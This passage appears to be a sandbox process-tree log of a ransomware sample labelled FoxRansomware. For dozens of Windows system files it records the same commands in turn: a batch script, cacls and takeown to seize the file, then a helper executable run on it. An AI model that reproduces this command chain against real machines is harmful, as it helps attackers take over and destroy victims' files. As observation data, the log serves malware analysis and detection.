- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
  2⤵
  PID:7000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"
    3⤵
    PID:6964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
    3⤵
    PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
      4⤵
      PID:6528
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""
  2⤵
  PID:5224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
    3⤵
    PID:5744
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
      4⤵
      PID:3592
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
  2⤵
  PID:5348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
    3⤵
    PID:6848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
    3⤵
    - Modifies file permissions
    PID:5588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftWordpad.xml" -nobanner
    3⤵
    PID:6484
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftWordpad.xml" -nobanner
      4⤵
      PID:6852
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5f3b45a4-fdef-4f43-9b06-609cfcfe428c.1.etl""
  2⤵
  PID:6572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5f3b45a4-fdef-4f43-9b06-609cfcfe428c.1.etl" /E /G Admin:F /C
    3⤵
    PID:5896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.5f3b45a4-fdef-4f43-9b06-609cfcfe428c.1.etl"
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.5f3b45a4-fdef-4f43-9b06-609cfcfe428c.1.etl" -nobanner
    3⤵
    PID:5148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.5f3b45a4-fdef-4f43-9b06-609cfcfe428c.1.etl" -nobanner
      4⤵
      PID:4424
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7164
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.137cb050-e671-4049-a0a5-e0b2bc45162b.2.etl""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.137cb050-e671-4049-a0a5-e0b2bc45162b.2.etl" /E /G Admin:F /C
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.137cb050-e671-4049-a0a5-e0b2bc45162b.2.etl"
    3⤵
    - Modifies file permissions
    PID:6968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MoUsoCoreWorker.137cb050-e671-4049-a0a5-e0b2bc45162b.2.etl" -nobanner
    3⤵
    PID:1504
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MoUsoCoreWorker.137cb050-e671-4049-a0a5-e0b2bc45162b.2.etl" -nobanner
      4⤵
      PID:5304
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.94526dc2-1729-41b7-81f8-1db257f31a1f.1.etl""
  2⤵
  PID:5680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.94526dc2-1729-41b7-81f8-1db257f31a1f.1.etl" /E /G Admin:F /C
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.94526dc2-1729-41b7-81f8-1db257f31a1f.1.etl"
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "WuProvider.94526dc2-1729-41b7-81f8-1db257f31a1f.1.etl" -nobanner
    3⤵
    PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "WuProvider.94526dc2-1729-41b7-81f8-1db257f31a1f.1.etl" -nobanner
      4⤵
      PID:5396
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl""
  2⤵
  PID:6664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl" /E /G Admin:F /C
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl"
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl" -nobanner
    3⤵
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl" -nobanner
      4⤵
      PID:708
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  2⤵
  PID:3404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
    3⤵
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:3588
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:5316
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2708
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:5904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6960
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6588
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:4264
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:5976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2904
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:6656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:2192
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:6292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      PID:6220
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6728
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:5448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    PID:6040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:5652
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      PID:6200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:6516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:6892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      PID:5140
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl""
  2⤵
  PID:6632
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl" /E /G Admin:F /C
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl"
    3⤵
    PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl" -nobanner
    3⤵
    PID:5292
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "UpdateSessionOrchestration.649589de-d82c-48f5-8854-ee6034284d98.1.etl" -nobanner
      4⤵
      PID:4208
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:6964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    PID:5480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:6528
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:6676
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:6552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6388
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5744
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:6872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:6404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6000
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5160
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  2⤵
  PID:5348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
    3⤵
    - Modifies file permissions
    PID:5284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    3⤵
    PID:4424
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftLync2010.xml" -nobanner
      4⤵
      PID:3660
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5552
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  2⤵
  PID:4188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:6968
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    3⤵
    PID:5264
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
      4⤵
      PID:5756
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  2⤵
  PID:5196
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:1272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    3⤵
    PID:5168
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
      4⤵
      PID:6864
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:5516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    PID:708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:5604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:4760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.3dc8a511-35a6-4905-8eed-0a8c56bc2294.1.etl""
  2⤵
  PID:3084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.3dc8a511-35a6-4905-8eed-0a8c56bc2294.1.etl" /E /G Admin:F /C
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.3dc8a511-35a6-4905-8eed-0a8c56bc2294.1.etl"
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "NotificationUxBroker.3dc8a511-35a6-4905-8eed-0a8c56bc2294.1.etl" -nobanner
    3⤵
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "NotificationUxBroker.3dc8a511-35a6-4905-8eed-0a8c56bc2294.1.etl" -nobanner
      4⤵
      PID:4116
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:5496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5976
